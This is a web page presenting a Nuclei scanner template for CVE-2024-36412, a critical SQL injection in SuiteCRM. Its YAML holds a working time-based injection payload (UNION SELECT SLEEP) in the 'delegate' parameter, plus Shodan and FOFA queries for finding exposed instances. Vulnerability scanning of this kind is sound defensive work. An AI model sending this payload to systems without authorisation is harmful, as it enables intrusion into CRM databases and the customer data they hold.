Skip to content
Nuclei Templates

SuiteCRM - SQL Injection

ID: CVE-2024-36412

Severity: critical

Author: s4e-io

Tags: time-based-sqli,cve,cve2024,suitecrm,sqli

Description

Section titled “Description”

SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.

YAML Source

Section titled “YAML Source”
id: CVE-2024-36412


info:
  name: SuiteCRM - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
  remediation: |
    7.14.4 and 8.6.1
  reference:
    - https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36412
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-36412
    cwe-id: CWE-89
    cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: salesagility
    product: suitecrm
    shodan-query: title:"SuiteCRM"
    fofa-query: title="SuiteCRM"
  tags: time-based-sqli,cve,cve2024,suitecrm,sqli


http:
  - raw:
      - |
        @timeout: 15s
        GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")'
        condition: and
# digest: 4a0a00473045022005afed9667eb217a125498482cbc47c0d9de862a5d8e9c5e0f9ebb46502d7d5a02210081dda20296b58a344a531687d2f33432d7ce88148e53c4624e5a68382ec76a32:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36412.yaml"

View on Github